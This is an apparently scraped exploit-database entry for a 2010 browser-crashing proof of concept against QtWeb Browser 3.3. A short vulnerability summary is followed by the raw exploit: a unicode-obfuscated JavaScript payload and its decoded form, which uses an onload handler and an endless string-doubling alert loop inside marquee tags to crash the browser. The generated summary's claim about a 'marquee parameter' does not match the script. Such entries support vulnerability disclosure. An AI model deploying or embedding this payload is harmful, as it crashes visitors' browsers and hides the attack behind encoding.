QtWeb Browser version 3.3 Dos based in Xss

vendor:

QtWeb Browser

by:

PoisonCode

7,5

CVSS

HIGH

Denial of Service (DoS)

CWE

Product Name: QtWeb Browser

Affected Version From: 3.3

Affected Version To: 3.3

Patch Exists: NO

Related CWE: N/A

CPE: a:qtweb:qtweb_browser

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

QtWeb Browser version 3.3 Dos based in Xss

QtWeb Browser version 3.3 is vulnerable to a Denial of Service (DoS) attack due to a Cross-Site Scripting (XSS) vulnerability. The vulnerability is caused due to the application not properly sanitizing user-supplied input to the 'marquee' parameter. This can be exploited to cause a DoS condition by executing a specially crafted JavaScript code. Successful exploitation of this vulnerability can cause the browser to crash.

Mitigation:

Input validation should be used to prevent the execution of malicious code.

Source

Exploit-DB raw data:

# Title: QtWeb Browser version 3.3 Dos based in Xss
# Software:http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable Software:http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.3
# Tested on: Windows
# Author: PoisonCode
# Published: 2010-05-17
# CVE-ID:()

_____   _____                      _ _         
|  __ \ / ____|                    (_) |        
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _ 
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/

PanamaSecurity.blogspot.com

Anti Lammer Enconde
                                                                                                                                                                     
<script type="text/javascript">document.write('\u003C\u0062\u006F\u0064\u0079\u0020\u006F\u006E\u006C\u006F\u0061\u0064\u003D\u0022\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0062\u006C\u006F\u0063\u006B\u0028\u0029\u003B\u0022\u003E\u003C\u002F\u0062\u006F\u0064\u0079\u003E\u000D\u0020\u000D\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u003E\u000D\u0020\u000D\u0066\u0075\u006E\u0063\u0074\u0069\u006F\u006E\u0020\u0062\u006C\u006F\u0063\u006B\u0028\u0029\u0020\u007B\u000D\u0020\u000D\u0076\u0061\u0072\u0020\u0062\u0020\u003D\u0020\u0027\u005C\u0078\u0034\u0043\u005C\u0078\u0045\u0046\u005C\u0078\u0031\u0033\u005C\u0078\u0030\u0030\u0027\u003B\u000D\u0066\u006F\u0072\u0020\u0028\u0061\u0020\u003D\u0030\u003B\u0061\u003C\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u003B\u0061\u002B\u002B\u0029\u0020\u007B\u000D\u0062\u002B\u003D\u0062\u002B\u0027\u005C\u0078\u0034\u0043\u005C\u0078\u0045\u0046\u005C\u0078\u0031\u0033\u005C\u0078\u0030\u0030\u0027\u003B\u000D\u0061\u006C\u0065\u0072\u0074\u0028\u0027\u003C\u0068\u0074\u006D\u006C\u003E\u003C\u006D\u0061\u0072\u0071\u0075\u0065\u0065\u003E\u003C\u0068\u0031\u003E\u0027\u002B\u0062\u002B\u0062\u0029\u003B\u000D\u000D\u007D\u000D\u0020\u000D\u007D\u000D\u0020\u000D\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E\u000D\u000D');</script>

==================================================
Exploit-DB Notes - Decoded Version:
==================================================

<body onload="javascript:block();"></body>

<script>
function block() {
var b = '\x4C\xEF\x13\x00';
for (a =0;a<99999999999;a++) {
b+=b+'\x4C\xEF\x13\x00';
alert('<html><marquee><h1>'+b+b);
}
}
</script>